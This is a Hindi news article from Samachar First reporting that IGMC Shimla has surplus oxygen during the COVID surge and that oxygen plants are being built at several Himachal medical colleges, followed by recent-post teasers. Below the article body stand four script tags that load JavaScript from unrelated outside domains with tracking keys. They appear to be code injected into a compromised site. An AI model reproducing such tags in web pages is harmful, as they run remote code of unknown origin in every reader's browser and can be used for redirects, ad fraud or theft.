Categories: हिमाचल

प्रदेश के सबसे बड़े अस्पताल IGMC में अभी तक सरप्लस ऑक्सीजन

<p>देश भर में कोविड के मामलों में बढ़ोतरी के चलते ऑक्सीजन के लिए हाहाकर मचा हुआ है। लेकिन हिमाचल में ऑक्सीजन के मामले पर हालात काबू में है। प्रदेश के सबसे बड़े अस्पताल आईजीएमसी में वर्ष 2017 में लगाया गया ऑक्सीजन प्लांट कोविड-19 के मरीजों के लिए वरदान साबित हो रहा है। 3600 क्युविक लीटर क्षमता वाले प्लांट में से 3000 क्युविक लीटर ऑक्सीजन की रोजना आईजीएमसी में ख़पत हो रही है। जबकि 600 क्युविक लीटर अभी भी बच रही है। 2017 में कांग्रेस के कार्यकाल में आईजीएमसी शिमला में ऑक्सीजन प्लांट लगाया गया था। अभी पूरे प्रदेश को आईजीएमसी शिमला और मंडी स्थित ऑक्सीजन प्लांट से ही ऑक्सीजन की सप्लाई पूरी की जाती है।</p>

<p>शिमला आईजीएमसी के ऑक्सीजन प्लांट के केमिकल एनालिस्ट ऑफिसर हरीश शर्मा ने बताया कि IGMC ऑक्सीजन प्लांट से आईजीएमसी के कोरोना पॉजिटिव मरीजों, ऑपरेशन थिएटर और अन्य मरीजों के अलावा शिमला के कमल नेहरू अस्पताल के लिए भी ऑक्सीजन की आपूर्ति की जा रही है। अभी ऑक्सीजन की कोई कमी नहीं है बल्कि सरप्लस ऑक्सीजन उपलब्ध है। प्लांट से हर रोज 600D type के बड़े ऑक्सीजन सिलेंडर भरे जाते हैं। यदि भविष्य में कोरोना बढ़ता है और ऑक्सीजन की मांग बढ़ती है तो उसके लिए 20 हजार लीटर की क्षमता का लिक्विड ऑक्सीजन टैंक लगाने के लिए सरकार को प्रस्ताव भेजा गया है। हां पहले जहां प्लांट 12 घंटे काम करता था अब 24 घंटे कर दिया है ताकि ऑक्सीजन की कमी न हो।</p>

<p>हिमाचल के नाहन, डीडीयू, मंडी, टीएमसी, आईजीएमसी, हमीरपुर और चंबा मेडिकल कॉलेज में ऑक्सीजन प्लांट स्थापित किए जा रहे हैं। इन ऑक्सीजन प्लांट के बन जाने से अस्पतालों में आने वाली ऑक्सीजन कि किल्लत की समस्या दूर हो जाएगी। हिमाचल में नाहन, दीन दयाल उपाध्याय, मंडी, टीएमसी, आईजीएमसी में ऑक्सीजन प्लांट बन कर तैयार हो चुके हैं। यहां पर भी जल्द ही ऑक्सीजन बनना शुरू होने वाली है। कोविड के बढ़ते मामलों के चलते ऑक्सीजन की भारी जरूरत महसूस की जा रही है।</p>

<p><img src=”/media/gallery/images/image(2745).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1619579394618″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Himachal: हिमाचल प्रदेश के बिजली उपभोक्ताओं को सब्सिडी अब सीधे बैंक खाते में मिलेगी

Himachal power subsidy:  हिमाचल प्रदेश के बिजली उपभोक्ताओं को अब बिजली पर मिलने वाली सब्सिडी…

10 seconds ago

Mandi News: नवरात्रों में माता बगलामुखी मंदिर में भक्तों का उमड़ा सैलाब, भक्तों की मनोकामनाएं हो रही हैं पूर्ण

Baglamukhi Temple  : सदर विधानसभा क्षेत्र के तुंगल में स्थित प्रसिद्ध देवी माता बगलामुखी मंदिर…

21 mins ago

Pakistan News: शादी की मनाही पर लड़की ने परिवार को दिया जहर, 13 की मौत

Pakistan family poisoned murder : पाकिस्तान के सिंध प्रांत में एक दिल दहला देने वाली…

28 mins ago

मुख्यमंत्री सुक्खू ने अचानक किया IGMC शिमला का निरीक्षण, मरीजों से लिया फीडबैक

CM Sukhu visits IGMC Shimla:  हिमाचल प्रदेश के मुख्यमंत्री सुखविंद्र सिंह सुक्खू सोमवार सुबह 7:00…

47 mins ago

नवाचार को बढ़ावा दे रहा एटीसी शाहपुर

नवीन तकनीक और प्रौद्योगिकी से आत्मनिर्भरता की ओर बढ़ रहे कदम Kangra:  उपयुक्त प्रौद्योगिकी केन्द्र…

18 hours ago

हिमाचल में कांस्टेबल भर्ती: निगेटिव मार्किंग के साथ फिजिकल और लिखित परीक्षा में कड़ी शर्तें, विस्‍तार से जानें

Himachal:  हिमाचल प्रदेश में होने जा रही विशेष पुलिस कांस्टेबल भर्ती की लिखित परीक्षा में…

19 hours ago